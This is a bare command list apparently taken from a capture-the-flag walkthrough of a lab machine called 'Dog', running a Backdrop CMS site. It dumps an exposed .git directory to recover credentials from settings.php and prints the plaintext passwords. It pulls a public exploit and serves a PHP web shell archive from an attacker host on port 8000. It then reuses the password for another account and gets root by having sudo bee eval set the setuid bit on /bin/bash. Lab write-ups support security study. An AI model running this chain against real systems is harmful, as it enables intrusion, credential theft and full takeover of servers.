Dog
wget --mirror -I .git http://10.10.11.58/.git/
cd downloaded-folder
ls -al
sudo git restore .
ls -al
cat settings.php
tiffany / BackDropJ2024DS2024
searchsploit -m php/webapps/52021.py
tar cvzf shell.tar.gz shell
python3 -m http.server 8000
http://10.10.14.130:8000/shell.tar.gz
http://10.10.11.58//modules/shell/shell.php
mysql -h 127.0.0.1 -u root -p
johncusack / BackDropJ2024DS2024
sudo -l
sudo /usr/local/bin/bee --root=/var/www/html eval "system('chmod u+s /bin/bash');"
bash -p